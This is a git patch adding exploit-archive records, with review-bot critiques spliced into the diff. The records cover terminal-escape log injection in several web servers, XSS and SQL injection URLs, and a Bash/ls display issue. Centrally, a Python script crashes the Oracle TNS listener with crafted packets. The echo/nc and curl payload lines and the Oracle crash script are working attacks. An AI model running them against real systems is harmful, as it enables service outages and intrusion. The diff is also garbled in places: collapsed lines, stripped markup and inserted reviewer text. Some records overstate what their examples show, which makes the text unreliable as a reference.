From 1a66c6956ff93501bc9b42e58e94d2ed6738a9b3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 27 May 2014 04:36:34 +0000
Subject: [PATCH] Updated 05_27_2014

---
 files.csv | 15 +++
 platforms/linux/local/33508.txt | 16 +++
 platforms/multiple/dos/33506.py | 156 +++++++++++++++++++++++++++
 platforms/multiple/remote/33497.txt | 13 +++
 platforms/multiple/remote/33498.txt | 12 +++
 platforms/multiple/remote/33499.txt | 10 ++
 platforms/multiple/remote/33500.txt | 12 +++
 platforms/multiple/remote/33503.txt | 13 +++
 platforms/multiple/remote/33504.txt | 9 ++
 platforms/multiple/webapps/33511.txt | 9 ++
 platforms/php/webapps/33505.txt | 11 ++
 platforms/php/webapps/33507.txt | 9 ++
 platforms/php/webapps/33509.txt | 7 ++
 platforms/php/webapps/33510.txt | 9 ++
 platforms/windows/remote/33501.txt | 9 ++
 platforms/windows/remote/33502.txt | 14 +++
 16 files changed, 324 insertions(+)
 create mode 100755 platforms/linux/local/33508.txt
 create mode 100755 platforms/multiple/dos/33506.py
 create mode 100755 platforms/multiple/remote/33497.txt
 create mode 100755 platforms/multiple/remote/33498.txt
 create mode 100755 platforms/multiple/remote/33499.txt
 create mode 100755 platforms/multiple/remote/33500.txt
 create mode 100755 platforms/multiple/remote/33503.txt
 create mode 100755 platforms/multiple/remote/33504.txt
 create mode 100755 platforms/multiple/webapps/33511.txt
 create mode 100755 platforms/php/webapps/33505.txt
 create mode 100755 platforms/php/webapps/33507.txt
 create mode 100755 platforms/php/webapps/33509.txt
 create mode 100755 platforms/php/webapps/33510.txt
 create mode 100755 platforms/windows/remote/33501.txt
 create mode 100755 platforms/windows/remote/33502.txt

diff --git a/files.csv b/files.csv
index e4466735b..ecb831a19 100755
--- a/files.csv
+++ b/files.csv
@@ -30176,3 +30176,18 @@ id,file,description,date,author,platform,type,port 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33500,platforms/multiple/remote/33500.txt,"mini_httpd <= 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws <= 1.55 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0 +33503,platforms/multiple/remote/33503.txt,"Orion Application Server <= 2.0.7 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability",2010-01-12,Red-D3v1L,php,webapps,0 +33506,platforms/multiple/dos/33506.py,"Oracle 
Database CVE-2010-0071 Remote Listener Memory Corruption Vulnerability",2010-01-12,"Dennis Yurichev",multiple,dos,0 +33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x 'search.php' Cross-Site Scripting Vulnerability",2010-01-12,Sora,php,webapps,0 +33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0 +33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0 +33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 +33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 diff --git a/platforms/linux/local/33508.txt b/platforms/linux/local/33508.txt new file mode 100755 index 000000000..7e7942356 --- /dev/null +++ b/platforms/linux/local/33508.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/37776/info + +GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command. + +Attackers can exploit this issue to execute arbitrary commands in a bash terminal; other attacks may also be possible. + +The following example is available: + +1. mkdir $(echo -e 'couc\x08\x08asd') +2. ls + +Displays: +coasd/ + +Expected: +couc??asd/ \ No newline at end of file diff --git a/platforms/multiple/dos/33506.py b/platforms/multiple/dos/33506.py new file mode 100755 index 000000000..6b3e85bd1 --- /dev/null +++ b/platforms/multiple/dos/33506.py 
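Review bot: Several of the new index rows disagree with the record files they point at: `33499` says `thttpd <= 2.24` and `33500` says `mini_httpd <= 1.18`, while both 33499.txt and 33500.txt state that thttpd 2.25b and mini_httpd 1.19 are affected, and `33502` says `Yaws <= 1.55` but 33502.txt says Yaws 1.85 is vulnerable. Whichever side is right, the description column is what consumers of this index search, so it should carry the same version as the record body. The `33510` author field has a trailing space inside the quotes (`"ViRuSMaN "`) that no other row has. 33501 and 33502 are filed under platform `windows` although their record bodies mention no platform and the parallel evilaliv3 entries in this batch are `multiple`; that looks like a classification inconsistency worth confirming against the referenced BIDs.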
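Review bot: The record attributes the behaviour to GNU Bash, but the reproducer exercises `ls` output: a directory whose name contains backspace bytes is listed as `coasd/` rather than the quoted `couc??asd/`, which appears to be a control-character quoting question in the `ls` program (coreutils) rather than in the shell, so the title should be checked against the referenced BID before it is indexed as a Bash issue. The example also demonstrates display spoofing in the terminal, not execution of a command, so `Attackers can exploit this issue to execute arbitrary commands in a bash terminal` overstates what the file shows; suggest `The example shows control characters in a file name reaching the terminal unescaped; whether that can be turned into command execution depends on the terminal emulator.` The defensive point that follows from it (quote or strip non-printable bytes before a file name is written to a tty) is not stated anywhere in the record.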
@@ -0,0 +1,156 @@ +source: http://www.securityfocus.com/bid/37728/info + +Oracle Database is prone to a remote memory-corruption vulnerability in Listener. + +The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker does not require privileges to exploit this vulnerability. + +This vulnerability affects the following supported versions: +9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7 + +# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash + +# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt +# to allocate huge memory block and copy *something* to it. + +# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95)) +# TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020 +# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab)) + +# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched) +# If I correct, nsglvcrt() function is involved in new service creation. 
+ +# Successfully crashed: +# Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied +# Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied +# Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied +# Oracle RDBMS 10.2.0.2 Linux x86 +# Not crashed: +# Oracle RDBMS 11.2 Linux x86 + +# Vulnerability discovered by Dennis Yurichev + +# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0): +# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html + +from sys import * +from socket import * + +sockobj = socket(AF_INET, SOCK_STREAM) + +sockobj.connect ((argv[1], 1521)) + +sockobj.send( + "\x00\x68\x00\x00\x01\x00\x00\x00" + "\x01\x3A\x01\x2C\x00\x00\x20\x00" + "\x7F\xFF\xC6\x0E\x00\x00\x01\x00" + "\x00\x2E\x00\x3A\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x28\x43\x4F\x4E\x4E\x45" + "\x43\x54\x5F\x44\x41\x54\x41\x3D" + "\x28\x43\x4F\x4D\x4D\x41\x4E\x44" + "\x3D\x73\x65\x72\x76\x69\x63\x65" + "\x5F\x72\x65\x67\x69\x73\x74\x65" + "\x72\x5F\x4E\x53\x47\x52\x29\x29" +) + +data=sockobj.recv(102400) + +sockobj.send( + "\x02\xDE\x00\x00\x06\x00\x00\x00" + "\x00\x00\x00\x00\x02\xD4\x20\x08" + "\xFF\x03\x01\x00\x12\x34\x34\x34" + "\x34\x34\x78\x10\x10\x32\x10\x32" + "\x10\x32\x10\x32\x10\x32\x54\x76" + "\x00\x78\x10\x32\x54\x76\x44\x00" + "\x00\x80\x02\x00\x00\x00\x00\x04" + "\x00\x00\x70\xE4\xA5\x09\x90\x00" + "\x23\x00\x00\x00\x42\x45\x43\x37" + "\x36\x43\x32\x43\x43\x31\x33\x36" + "\x2D\x35\x46\x39\x46\x2D\x45\x30" + "\x33\x34\x2D\x30\x30\x30\x33\x42" + "\x41\x31\x33\x37\x34\x42\x33\x03" + "\x00\x65\x00\x01\x00\x01\x00\x00" + "\x00\x00\x00\x00\x00\x00\x64\x02" + "\x00\x80\x05\x00\x00\x00\x00\x04" + "\x00\x00\x00\x00\x00\x00\x01\x00" + "\x00\x00\x10\x00\x00\x00\x02\x00" + "\x00\x00\x84\xC3\xCC\x07\x01\x00" + "\x00\x00\x84\x2F\xA6\x09\x00\x00" + "\x00\x00\x44\xA5\xA2\x09\x25\x98" + "\x18\xE9\x28\x50\x4F\x28\xBB\xAC" + "\x15\x56\x8E\x68\x1D\x6D\x05\x00" + 
"\x00\x00\xFC\xA9\x36\x22\x0F\x00" + "\x00\x00\x60\x30\xA6\x09\x0A\x00" + "\x00\x00\x64\x00\x00\x00\x00\x00" + "\x00\x00\xAA\x00\x00\x00\x00\x01" + "\x00\x00\x17\x00\x00\x00\x78\xC3" + "\xCC\x07\x6F\x72\x63\x6C\x00\x28" + "\x48\x4F\x53\x54\x3D\x77\x69\x6E" + "\x32\x30\x30\x33\x29\x00\x01\x00" + "\x00\x00\x58\x00\x00\x00\x01\x00" + "\x00\x00\x50\xC5\x2F\x22\x02\x00" + "\x00\x00\x34\xC5\x2F\x22\x00\x00" + "\x00\x00\x9C\xC5\xCC\x07\x6F\x72" + "\x63\x6C\x5F\x58\x50\x54\x00\x09" + "\x00\x00\x00\x50\xC5\x2F\x22\x04" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x34" + "\xC5\xCC\x07\x6F\x72\x63\x6C\x5F" + "\x58\x50\x54\x00\x01\x00\x00\x00" + "\x05\x00\x00\x00\x01\x00\x00\x00" + "\x84\xC5\x2F\x22\x02\x00\x00\x00" + "\x68\xC5\x2F\x22\x00\x00\x00\x00" + "\xA4\xA5\xA2\x09\x6F\x72\x63\x6C" + "\x00\x05\x00\x00\x00\x84\xC5\x2F" + "\x22\x04\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xFC\xC4\xCC\x07\x6F\x72\x63" + "\x6C\x00\x01\x00\x00\x00\x10\x00" + "\x00\x00\x02\x00\x00\x00\xBC\xC3" + "\xCC\x07\x04\x00\x00\x00\xB0\x2F" + "\xA6\x09\x00\x00\x00\x00\x00\x00" + "\x00\x00\x89\xC0\xB1\xC3\x08\x1D" + "\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7" + "\x66\x6D\x0A\x00\x00\x00\x78\x2B" + "\xBC\x04\x7F\x00\x00\x00\x64\xA7" + "\xA2\x09\x0D\x00\x00\x00\x20\x2C" + "\xBC\x04\x11\x00\x00\x00\x95\x00" + "\x00\x00\x02\x20\x00\x80\x03\x00" + "\x00\x00\x98\xC5\x2F\x22\x00\x00" + "\x00\x00\x00\x00\x00\x00\x0A\x00" + "\x00\x00\xB0\xC3\xCC\x07\x44\x45" + "\x44\x49\x43\x41\x54\x45\x44\x00" + "\x28\x41\x44\x44\x52\x45\x53\x53" + "\x3D\x28\x50\x52\x4F\x54\x4F\x43" + "\x4F\x4C\x3D\x42\x45\x51\x29\x28" + "\x50\x52\x4F\x47\x52\x41\x4D\x3D" + "\x43\x3A\x5C\x61\x70\x70\x5C\x41" + "\x64\x6D\x69\x6E\x69\x73\x74\x72" + "\x61\x74\x6F\x72\x5C\x70\x72\x6F" + "\x64\x75\x63\x74\x5C\x31\x31\x2E" + "\x31\x2E\x30\x5C\x64\x62\x5F\x31" + "\x5C\x62\x69\x6E\x5C\x6F\x72\x61" + "\x63\x6C\x65\x2E\x65\x78\x65\x29" + "\x28\x41\x52\x47\x56\x30\x3D\x6F" + "\x72\x61\x63\x6C\x65\x6F\x72\x63" + 
"\x6C\x29\x28\x41\x52\x47\x53\x3D" + "\x27\x28\x4C\x4F\x43\x41\x4C\x3D" + "\x4E\x4F\x29\x27\x29\x29\x00\x4C" + "\x4F\x43\x41\x4C\x20\x53\x45\x52" + "\x56\x45\x52\x00\x68\xC5\x2F\x22" + "\x34\xC5\x2F\x22\x00\x00\x00\x00" + "\x05\x00\x00\x00\x84\xC5\x2F\x22" + "\x04\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xFC\xC4\xCC\x07\x6F\x72\x63\x6C" + "\x00\x09\x00\x00\x00\x50\xC5\x2F" + "\x22\x04\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x34\xC5\xCC\x07\x6F\x72\x63" + "\x6C\x5F\x58\x50\x54\x00" +) + +sockobj.close() + diff --git a/platforms/multiple/remote/33497.txt b/platforms/multiple/remote/33497.txt new file mode 100755 index 000000000..7243ddc32 --- /dev/null +++ b/platforms/multiple/remote/33497.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37712/info + +AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +AOLServer 4.5.1 is vulnerable; other versions may also be affected. + +The following example is available: + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc www.example.com 80 < payload + diff --git a/platforms/multiple/remote/33498.txt b/platforms/multiple/remote/33498.txt new file mode 100755 index 000000000..fc6b7881e --- /dev/null +++ b/platforms/multiple/remote/33498.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37713/info + +Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Varnish 2.0.6 is vulnerable; other versions may also be affected. + +The following example is available: + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload \ No newline at end of file 
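Review bot: The advisory summary at the top of the new file (from the `source: http://www.securityfocus.com/bid/37728/info` line through the version list) is not commented out, so the module is a SyntaxError before any code runs; prefix those lines with `#` like the author's own header below them, or wrap them in a module docstring. `argv[1]` is read with no length check, so running the script without a host argument dies with an IndexError instead of a usage message, e.g. `if len(argv) != 2: exit("usage: %s <host>" % argv[0])`. The star-imports from `sys` and `socket` and the unused `data` result are style points; more useful for anyone archiving this is that the `send` calls pass `str` literals, which only works under Python 2, so a `#!/usr/bin/env python2` line or a comment naming the interpreter would save the next reader a TypeError.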
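Review bot: The claim that attackers can `execute arbitrary commands in a terminal` is not what the example demonstrates: the request carries an OSC sequence (`\x1b]2;...\x07`) that, once written unescaped to the access log, changes the title of a terminal in which the log is viewed. Whether that escalates to command execution depends on the terminal emulator the administrator uses, not on AOLServer, so a sentence such as `The server writes non-printable request bytes to its log unescaped; the impact depends on the terminal used to read the log.` would describe the finding accurately. The same wording, and the same gap, appears in 33498.txt, 33499.txt, 33500.txt, 33503.txt, 33504.txt, 33501.txt and 33502.txt. 33499.txt and 33500.txt cite the same BID 37714 with identical prose and differ only by the added `curl` line, so one of them looks like a duplicate record. The mitigation side (escape or drop bytes outside the printable range when writing the log line, and read logs with a viewer that neutralises escape sequences) is absent from all eight files.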
diff --git a/platforms/multiple/remote/33499.txt b/platforms/multiple/remote/33499.txt
new file mode 100755
index 000000000..416cf311b
--- /dev/null
+++ b/platforms/multiple/remote/33499.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37714/info
+
+Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected.
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
diff --git a/platforms/multiple/remote/33500.txt b/platforms/multiple/remote/33500.txt
new file mode 100755
index 000000000..9f1871835
--- /dev/null
+++ b/platforms/multiple/remote/33500.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37714/info
+
+Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected.
+
+curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
\ No newline at end of file
diff --git a/platforms/multiple/remote/33503.txt b/platforms/multiple/remote/33503.txt
new file mode 100755
index 000000000..5d75579c2
--- /dev/null
+++ b/platforms/multiple/remote/33503.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37717/info
+
+Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Orion Application Server 2.0.7 is vulnerable; other versions may also be affected.
+
+
+curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
\ No newline at end of file
diff --git a/platforms/multiple/remote/33504.txt b/platforms/multiple/remote/33504.txt
new file mode 100755
index 000000000..1c328b3df
--- /dev/null
+++ b/platforms/multiple/remote/33504.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37718/info
+
+Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected.
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33511.txt b/platforms/multiple/webapps/33511.txt
new file mode 100755
index 000000000..9f6c3414f
--- /dev/null
+++ b/platforms/multiple/webapps/33511.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37802/info
+
+Zenoss is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zenoss 2.3.3 is affected; other versions may be vulnerable as well.
+
+http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z"
\ No newline at end of file
diff --git a/platforms/php/webapps/33505.txt b/platforms/php/webapps/33505.txt
new file mode 100755
index 000000000..f662b59fb
--- /dev/null
+++ b/platforms/php/webapps/33505.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37721/info
+
+Docmint is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other versions may be affected as well.
+
+http://www.example.com/index.php?id='">
+http://www.example.com/index.php?id=Th3 RDX/font>
+http://www.example.com/index.php?id=Redirect...Redirect in corso...
\ No newline at end of file
diff --git a/platforms/php/webapps/33507.txt b/platforms/php/webapps/33507.txt
new file mode 100755
index 000000000..bbe9e88c7
--- /dev/null
+++ b/platforms/php/webapps/33507.txt
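Review bot: The three example URIs at the end of 33505.txt have lost their markup in transit: `id='">`, `id=Th3 RDX/font>` and `id=Redirect...Redirect in corso...` are fragments with the tags stripped, so the record no longer documents a reproducible request or says which response context the `id` parameter lands in. Replacing the three lines with the single placeholder form `http://www.example.com/index.php?id=[XSS]`, which is how 33509.txt and 33510.txt in this batch mark the injection point, would at least keep the record consistent and honest about what it contains. 33507.txt has the same problem: its `search.php?q=">` line is followed by stray rendered text (`Hacked by Sora`) rather than the request that was tested.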
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37752/info + +Simple PHP Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Simple PHP Blog 0.5.11 is vulnerable; other versions may also be affected. + +http://serverwww.example.com/blog/search.php?q=">

Hacked by Sora

\ No newline at end of file
diff --git a/platforms/php/webapps/33509.txt b/platforms/php/webapps/33509.txt
new file mode 100755
index 000000000..53ae0b97b
--- /dev/null
+++ b/platforms/php/webapps/33509.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37798/info
+
+The Joomla! 'com_artistavenue' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/index.php?option=com_tienda&task=verproducto&categoria=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/33510.txt b/platforms/php/webapps/33510.txt
new file mode 100755
index 000000000..00a6a679f
--- /dev/null
+++ b/platforms/php/webapps/33510.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37800/info
+
+Tribisur is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example URI is available:
+
+http://www.example.com/forum.php?action=liste&cat=[Xss Vuln]
\ No newline at end of file
diff --git a/platforms/windows/remote/33501.txt b/platforms/windows/remote/33501.txt
new file mode 100755
index 000000000..197739c5a
--- /dev/null
+++ b/platforms/windows/remote/33501.txt
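Review bot: The description in 33509.txt names the `com_artistavenue` component, but the example URI (`option=com_tienda&task=verproducto&categoria=[XSS]`) and the files.csv row for 33509 both refer to `com_tienda`, so the prose and the reproducer disagree about which component is affected. Unless the referenced BID really covers com_artistavenue, the sentence should read `The Joomla! 'com_tienda' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.`. Unlike 33505.txt and 33507.txt, this record and 33510.txt give no affected version at all, which makes them hard to act on for anyone checking an installation.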
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37715/info
+
+Cherokee is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Cherokee 0.99.30 and prior are vulnerable.
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
\ No newline at end of file
diff --git a/platforms/windows/remote/33502.txt b/platforms/windows/remote/33502.txt
new file mode 100755
index 000000000..ce640b1cb
--- /dev/null
+++ b/platforms/windows/remote/33502.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/37716/info
+
+Yaws is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Yaws 1.85 is vulnerable; other versions may also be affected.
+
+The following example is available:
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
+